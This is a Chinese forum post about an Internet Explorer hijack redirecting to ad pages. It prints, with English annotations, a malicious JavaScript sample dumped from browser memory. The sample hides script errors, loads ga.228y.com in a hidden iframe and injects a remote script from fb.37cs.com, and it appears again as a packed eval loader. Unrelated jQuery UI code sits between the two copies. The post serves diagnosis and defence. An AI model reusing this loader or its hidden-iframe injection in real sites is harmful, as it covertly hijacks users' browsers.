IE被p.5mnh.com劫持了,发现主域名是ga.228y.com,
在hosts文件里直接屏蔽这个域名,就不会再跳转到p.5mnh.com广告页面了,但是流氓程序依然不知道是哪个,
接着分析发现IE打开了下面这个地址
res://ieframe.dll/navcancl.htm#https://ga.228y.com/
原来是res协议,可以参考http://baike.baidu.com/view/1508651.html,
可能是shdoclc.dll或ieframe.dll被劫持了(注:navcancl.htm是ieframe.dll自带的“导航已取消”页面,IE取消一次导航时就会显示它,单凭这个地址并不能说明DLL被篡改)
于是打开IE设置,点击重置,问题解决
360卫士竟然都查不出来
从内存里dump了下面这段js代码,求解决办法
// Sample as dumped from browser memory (per the post); code is left verbatim.
// Installs a page-wide error handler that always returns true, which tells the
// browser the error was handled, so script errors raised by the code below are
// not reported to the user.
window.onerror = function () {return true;};
/**
 * _sC: cookie setter. Builds "name=value" plus optional expires / path / domain /
 * secure attributes and assigns the result to document.cookie.
 *
 * expiry: when it has toGMTString() (a Date) that value is used directly; when that
 *   call throws and expiry is truthy, it is treated as a number of seconds from now
 *   (expiry * 1000 ms is added to the current time).
 * path:   " ;path=/" is used when path is null/undefined.
 * domain: omitted when null/undefined.
 * secure: any truthy value appends ";secure=".
 *
 * NOTE(review): in this dump the string literal that starts with `" ;` is broken
 * across two lines before `domain = "`. A raw line break inside a quoted string is
 * not valid JavaScript, so this is presumably a wrap artifact of the paste rather
 * than the script as it ran; confirm against the packed copy further down the page
 * before relying on the exact bytes.
 */
function _sC(name, value, expiry, path, domain, secure) {
var nameString = name + "=" + value;var expiryString = "";
// Date path first; a non-Date expiry makes toGMTString() throw and falls into the catch.
if (expiry != null) {try {expiryString = "; expires=" + expiry.toGMTString();
} catch (e) {
if (expiry) {var lsd = new Date;lsd.setTime(lsd.getTime() + expiry * 1000);
expiryString = "; expires=" + lsd.toGMTString();}}}
var pathString = path == null ? " ;path=/" : " ;path = " + path;var domainString = domain == null ? "" : " ;
domain = " + domain;var secureString = secure ? ";secure=" : "";
document.cookie = nameString + expiryString + pathString + domainString + secureString;}
/**
 * _gC: cookie getter. Walks document.cookie one character at a time looking for the
 * text `name=`; on the first hit it returns the unescape()d value that follows, up to
 * the next ";" or the end of the string. Returns "" when nothing matches.
 *
 * The comparison is a plain substring test with no check of what precedes the hit, so
 * a cookie whose name merely ends in `name` is matched as well.
 */
function _gC(name) {var CookieFound = false, start = 0, end = 0, CookieString = document.cookie;var i = 0;
while (i <= CookieString.length) {start = i;end = start + name.length;
if (CookieString.substring(start, end + 1) == name + "=") {CookieFound = true;break;}i++;}
// On a hit, `end + 1` is the first character after "="; the value runs to the next ";".
if (CookieFound) {start = end + 1;end = CookieString.indexOf(";", start);if (end < start) {
end = CookieString.length;
}
return unescape(CookieString.substring(start, end));}
// The next line closes _gC and, on the same line, opens _ui.
// _ui: creates an <iframe> from document `d` (the current document when d is
// null/undefined), sets its src to `u` and its style to display:none, then appends it
// to document.body. The URL is therefore loaded with nothing visible on the page.
// The append always goes to the global document.body, even when `d` was supplied.
return "";}function _ui(u, d) {if (d == null) {d = document;}
var c = d.createElement("iframe");c.src = u;c.style.display = "none";document.body.appendChild(c);}
// _u2: deferred wrapper around _ui. When document.body already exists the hidden
// iframe is inserted immediately; otherwise the call re-schedules itself every
// 100 ms until the body is available.
function _u2(u, d) {if (document.body) {_ui(u, d);}
else {window.setTimeout(function () {_u2(u, d);}, 100);}}
// _pdfilter: returns true when `v` contains "4818", "5747", "4836" or "37wan.com"
// (case-insensitive). r() applies it to location.href to choose between its two
// branches. NOTE(review): the meaning of the three numbers is not established by the
// sample; presumably page or channel identifiers — confirm.
function _pdfilter(v) {return /(4818)|(5747)|(4836)|(37wan\.com)/i.test(v);}
// _us2: emits a <Script src="u"> tag into the page with document.writeln, so the
// script at `u` is fetched and run in the context of the current page. `u` is
// concatenated into the markup without any escaping.
function _us2(u) {document.writeln("<Script src=\"" + u + "\"></Script>");}
// r: entry point, invoked immediately after its definition.
//   - Reads the current URL and the "__v_c" cookie, which is used as a counter
//     (empty cookie -> 0, otherwise parseInt of the stored text).
//   - URL does NOT match _pdfilter: the counter is incremented and, while it is
//     <= 3, written back with _sC(..., 10) and http://ga.228y.com/ is loaded through
//     _u2 in a hidden iframe. The numeric 10 reaches _sC's catch branch, i.e. a
//     10-second cookie lifetime.
//   - URL matches _pdfilter: a script tag for fb.37cs.com/feedback/track.php is
//     written into the page instead (the `else` pairs with the outer `if`).
// Observable indicators in this block: cookie name "__v_c", hosts ga.228y.com and
// fb.37cs.com.
// NOTE(review): the trailing "?" after `r();` is presumably a mis-encoded whitespace
// character from the paste, not part of the script — confirm.
function r() {var _h = location.href;var __v_c = _gC("__v_c");
if (__v_c == "") {__v_c = 0;} else {__v_c = parseInt(__v_c);}
if (!_pdfilter(_h)) {if (++__v_c <= 3) {_sC("__v_c", __v_c, 10);_u2("http://ga.228y.com/");}}
else
{_us2("http://fb.37cs.com/feedback/track.php?step=2_");}}r(); ?
?
// Page UI wiring (jQuery). Written with `var` and function expressions only, because
// the handlers below explicitly cater for IE 6/7.

// Once the DOM is ready, start the ticker on ".gn-news-box" with a 3000 ms interval.
$(function () {
  sroll(".gn-news-box", 1, 3000);
});

// "#gn-gl-detail" is visible only while the pointer is over "#gn-gl".
$("#gn-gl").hover(
  function () {
    $("#gn-gl-detail").show();
  },
  function () {
    $("#gn-gl-detail").hide();
  }
);

// Collapse the navigation list: size the content area to the window height minus the
// ".show_bar" strip, slide the list away and slide the strip in.
$("#show-gnbar").click(function () {
  var $strip = $(".show_bar");
  var $content = $('.sidebar,.arrow-item,#game_content_frame');
  $content.height($(window).height() - $strip.height());
  $("#gnbar-ul,#gnbar-ul li").slideUp();
  $strip.slideDown();

  // IE 6/7 only: after 500 ms re-run windowInit() and set the frame width to the
  // incremented global gframeWidth.
  var legacyIE = $.browser.msie && ($.browser.version == "7.0" || $.browser.version == "6.0");
  if (legacyIE) {
    setTimeout(function () {
      windowInit();
      $('#game_content_frame').width(++gframeWidth);
    }, 500);
  }
});

// Highlight the strip while hovered.
$(".show_bar").hover(
  function () {
    $(this).addClass("bgcolor2");
  },
  function () {
    $(this).removeClass("bgcolor2");
  }
);

// Expand the navigation list again: size the content area to the window height minus
// the "#gnbar-ul" list, slide the list in and slide the strip away.
$(".show_bar").click(function () {
  var $content = $('.sidebar,.arrow-item,#game_content_frame');
  $content.height($(window).height() - $("#gnbar-ul").height());
  $("#gnbar-ul,#gnbar-ul li").slideDown();
  $(".show_bar").slideUp();

  // Same IE 6/7 workaround as in the collapse handler.
  var legacyIE = $.browser.msie && ($.browser.version == "7.0" || $.browser.version == "6.0");
  if (legacyIE) {
    setTimeout(function () {
      windowInit();
      $('#game_content_frame').width(++gframeWidth);
    }, 500);
  }
});
/**
 * Vertical ticker for a list inside `box`.
 *
 * Every `Time` milliseconds the first <ul> in the box is animated upwards by the
 * height of its first <li>; when the animation ends the margin is reset and that
 * <li> is moved to the end of the list. Hovering the box pauses the ticker, leaving
 * it resumes it; the ticker is started by triggering "mouseleave" once.
 *
 * @param {string} box  - selector (or anything accepted by $()) for the container.
 * @param {*}      len  - accepted but not used by this function.
 * @param {number} Time - interval between steps, in milliseconds.
 */
var sroll = function (box, len, Time) {
  var $box = $(box);
  var timerId;

  // One ticker step: slide the list up by one row, then rotate the first row to the end.
  function rotateOnce(container) {
    var $list = $(container).find("ul:first");
    var rowHeight = $list.find("li:first").height();
    $list.animate({ "marginTop": -rowHeight + "px" }, 600, function () {
      $list.css({ marginTop: 0 }).find("li:first").appendTo($list);
    });
  }

  function pauseTicker() {
    clearInterval(timerId);
  }

  function resumeTicker() {
    timerId = setInterval(function () {
      rotateOnce($box);
    }, Time);
  }

  $box.hover(pauseTicker, resumeTicker).trigger("mouseleave");
};
还有一段
// Packed loader: an inline decoder expands the string argument and the result is
// handed to eval().
// Decoder, as written below: characters are copied through unchanged until a
// backtick is met. A backtick starts a 4-character token: the 4th character minus 28
// is a length `l`; when l > 4, `l` characters are copied from the already-decoded
// output at an offset computed from the 2nd and 3rd characters (a back-reference);
// otherwise a literal backtick is emitted.
// NOTE(review): the readable fragments of the packed string (function names _sC/_gC,
// the "__v_c" cookie, ga.228y.com, fb.37cs.com) match the plain script earlier on the
// page, so this appears to be the packed form of that same script — confirm by
// decoding. For analysis, pass the decoder's return value to a logger instead of
// eval() so the payload is recovered as text and never executed.
eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("window.onerror = function () {return true;};` 2%_sC(name, value, expiry, path, domain, secure) {var nameString =` (! + \"=\" +` ^\";var` `#` =%\"\";if (` 0\" != null) {try {` <,;` X\"es` o!` 8\".toGMT` >\"();} catch (e) {` p&`!Z#lsd = new Date;lsd.setTime(lsd.g` %#)` u% * 1000);`!-:lsd`!8,}}var`#(!` L%path =`\"=\" ? \" ;path=/\" :` %$ = \" +` E!`#)!`#a\"` Y%` )\"` X(` U#` 1$` Y!` '\"` [!`$9\"` W%` )\" ? \";` %\"=` [!\";document.cookie`$X#` Q#`\"e$` &%`\"+'`!&$` &%`!&(;}`&%&g`&)\"`$\"#C`!\"!Found = false, start = 0, e` 3!0,` B#`\"V'`![)`\"?!i = 0;while (i <=` H).length) {` w$i;` x\"` *\"+`\"E!` ?#`&g!` Q)subs`$n\"` J!`!T\"+ 1)`$ !`'Z%) {`\"%*`(j!break;}i++;}` p&` >!`!E'` k#`!O#`!1)indexOf(\";\"`\"x#)`(I\"nd <` *# {` F/`\"(#}`*6#unescape`!z>))` L%\"\"`$T(ui(u, d`(o#d`&\\$) {d`$-';`'q!c = d.createElement(\"iframe\");c.src = u;c.style.display = \"none`&d'body.appendChild(c)`!H)2`!H)` J() {`!k%;} else {`-C#`*M#out(`->)` g%;}, 100);}`!\"'pdfilter(v`-l&/(4818)|(5747)|(4836)|(37wan\\.com)/i.test(v`!k*s2(u) {`!j%writeln(\"<Script src=\\\"\" + u + \"\\\"></` 5\">\"` _(r(`(l#_h = location.href`(9!__v_c =`)<!\"` (!\"`%~\"` 2#= \"\") {` ?$0`##%` *$parseInt` K\")`'D\"!`\"d&_h)`#y#++` N\"<= 3) {_s`!)%,`!A\", 10);_u2(\"http://ga.228y.com/\");}`!4%us` ;&fb.37cs` @!feedback/track.php?step=2_` Z!r();"))